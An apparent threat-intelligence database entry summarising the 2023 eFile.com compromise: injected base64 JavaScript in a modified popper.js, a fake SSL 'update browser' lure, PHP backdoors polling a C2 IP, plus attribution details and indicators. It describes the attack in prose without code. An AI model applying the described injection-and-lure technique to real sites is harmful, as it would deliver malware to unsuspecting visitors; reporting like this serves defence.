Cyber Incident Victim: eFile.com
Date:
Feb 2023
Location:
United States of America
Summary
An IRS-authorized tax filing website was compromised to deliver JavaScript malware via a modified Bootstrap component, injecting malicious code across pages that displayed fraudulent SSL error messages prompting users to download malware-infected executables. The payloads established persistent backdoors enabling command execution, file retrieval, and lateral movement, though no direct theft of tax data occurred. Attack infrastructure linked to Chinese actors utilized Alibaba-hosted servers and a valid digital certificate from a Sichuan-based company. The campaign exploited high user traffic during tax season, with limited antivirus detection of the malicious files. The website operator's failure to detect unauthorized code modifications allowed prolonged access, potentially impacting numerous visitors before remediation.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
The incident involving the compromise of an IRS-authorized tax return website, eFile.com, occurred in early 2023, with malicious activity persisting for several weeks. Threat actors inserted base64-encoded JavaScript malware into a modified version of the legitimate Bootstrap add-on 'popper.js,' which was then loaded across nearly all pages of the website. This injected code connected to the domain infoamanewonliag[.]online and triggered a secondary malicious JavaScript file, 'update.js,' hosted on an Amazon AWS endpoint. The 'update.js' file displayed a fraudulent SSL error message containing a deceptive 'update browser' link that initiated malware downloads tailored to users' browsers—'update.exe' for Chromium-based browsers and 'installer.exe' for Firefox. These executables functioned as Windows backdoors written in PHP, establishing persistent connections to a command-and-control (C2) server at IP address 47.245.6.91 (hosted by Alibaba in Tokyo, Japan) every ten seconds. The backdoors enabled remote code execution, file downloads, and task scheduling, though there was no evidence of immediate theft of tax return data. Multiple users reported encountering the suspicious error message on a Reddit thread dated March 17, 2023, seeking validation from others about its legitimacy.
The attack infrastructure and forensic evidence suggested involvement by a Chinese threat actor. The malicious executables were signed with a valid digital certificate issued to Sichuan Niurui Science and Technology Co., Ltd., and Chinese-language comments were identified within the code. The threat actors attempted to remove the malicious JavaScript from eFile.com before the website operators fully remediated the compromise, likely to obscure their activities. Security researchers noted the operation's technical inconsistencies, including the unusual use of PHP for backdoor functionality and the clumsy integration of malicious code, indicating a less sophisticated but persistent adversary. The campaign specifically targeted eFile.com's third-party tax filing service, not the IRS's direct e-file systems, exploiting the high-traffic tax season to maximize potential infections. Approximately 1.1 million users visited the website during the compromise window, though the exact number of infected systems remains undetermined. Only two antivirus engines on VirusTotal (CrowdStrike Falcon and Cynet) initially flagged the executables as malicious. The website operator did not issue a public statement regarding the incident, and no containment or remediation actions beyond the eventual removal of the malicious code were documented in available sources. The primary confirmed impact was the installation of backdoors enabling future adversarial actions, including credential theft, lateral movement, and secondary payload deployment.